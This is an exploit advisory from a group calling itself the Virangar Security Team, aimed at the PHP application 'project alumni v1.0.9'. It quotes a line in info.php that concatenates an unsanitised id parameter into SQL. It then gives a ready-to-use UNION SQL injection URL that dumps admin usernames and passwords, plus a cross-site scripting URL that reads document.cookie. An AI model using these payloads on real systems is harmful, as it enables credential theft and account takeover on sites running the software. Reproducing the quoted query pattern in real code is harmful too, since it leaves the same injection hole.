########################################################################
###############
# #
# ...:::::project alumni v1.0.9 (info.php) SQL Injection Vulnerability ::::.... #
########################################################################
###############
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-------
vuln code in info.php:
line 58:
$result = dbQuery( "SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `ID` = '".$_GET['id']."'" );
---
exploit:
http://site.com/info.php?id='/**/union/**/select/**/1,2,3,concat(alumniU
serName,0x3a,char(58),alumniPassword),5,6,7,8,9,10,11,12,13,14,15,16,17,
18,19/**/from/**/alumni_users/**/where/**/userType=0x61646d696e/*
---
and xss in /pages/news.page.inc :)
http://site.com/index.php?act=news&year=<script>alert(document.cookie)</
script>
-------
young iranian h4ck3rz